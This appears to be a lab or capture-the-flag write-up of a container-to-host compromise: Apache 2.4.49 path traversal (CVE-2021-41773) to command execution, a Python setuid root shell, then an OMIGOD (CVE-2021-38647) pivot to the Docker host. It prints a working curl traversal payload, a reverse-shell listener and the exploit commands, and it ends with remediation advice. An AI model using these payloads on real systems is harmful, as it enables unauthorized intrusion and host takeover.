Apache 2.4.49 path traversal and OMI host pivot
Intermediate container-to-host engagement: CVE-2021-41773 on Apache 2.4.49 yielded CGI RCE inside a container; CVE-2021-38647 (OMIGOD) against the Docker bridge gateway compromised the host.
- Case files
- Apache 2.4.49 path traversal and OMI host pivot
Unauthenticated Apache path traversal executed commands as the web user, then setuid(0) inside the container. Scanning the Docker gateway exposed OMI; OMIGOD RCE returned host root.
Version scan pinned Apache 2.4.49. Encoded traversal to /bin/sh via cgi-bin returned command output and a reverse shell.
Python setuid(0) inside the container produced a root shell and the container user artifact under /root.
From the container we scanned 172.17.0.1 and ran CVE-2021-38647 to execute as root on the host.
Engagement summary
Unauthenticated Apache path traversal executed commands as the web user, then setuid(0) inside the container. Scanning the Docker gateway exposed OMI; OMIGOD RCE returned host root.
The target presented Apache httpd 2.4.49. Using CVE-2021-41773 (path traversal through cgi-bin with encoded dot-segments), we executed /bin/sh via CGI and opened a reverse shell. Inside the container, Python os.setuid(0) elevated to container root. We then scanned 172.17.0.1 from the container and exploited CVE-2021-38647 (OMIGOD / OMI) to run commands on the Docker host, recovering the host root artifact.
Business impact
Unpatched Apache 2.4.49 is remote RCE. Containers that can reach a vulnerable OMI endpoint on the host bridge turn a web CVE into hypervisor-adjacent compromise. Patch Apache past 2.4.49/2.4.50, disable unused CGI, and patch or isolate OMI (CVE-2021-38647).
CVE-2021-41773 path traversal RCE
Version scan pinned Apache 2.4.49. Encoded traversal to /bin/sh via cgi-bin returned command output and a reverse shell.
OPERATOR · NMAP
savvy@lab:~$ nmap -sSCV 10.10.88.41
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.49
savvy@lab:~$ searchsploit Apache 2.4.49
Apache 2.4.49 - Path Traversal & RCE (CVE-2021-41773)
OPERATOR · TRAVERSAL
savvy@lab:~$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://10.10.88.41/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
savvy@lab:~$ nc -lvnp 4444
# POST bash reverse shell through the same cgi-bin traversal
savvy@lab:/$ id
In-container elevation
Python setuid(0) inside the container produced a root shell and the container user artifact under /root.
OPERATOR · SETUID
savvy@lab:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
root@lab:~# hostname
container hostname / limited view
OMIGOD pivot to Docker host
From the container we scanned 172.17.0.1 and ran CVE-2021-38647 to execute as root on the host.
OPERATOR · OMIGOD
root@lab:~# nmap -sV 172.17.0.1
# OMI / WinRM-related services reachable on Docker bridge gateway
root@lab:~# python3 CVE-2021-38647.py -t 172.17.0.1 -c 'id; hostname; cat /root/root.txt'
uid=0(root) gid=0(root) groups=0(root)
host root artifact recovered
Remediation
Upgrade Apache to a fixed release; disable CGI if unused. Patch OMI for CVE-2021-38647; do not expose the Docker host management plane to containers; prefer user namespaces and network policies that block bridge-to-host admin ports.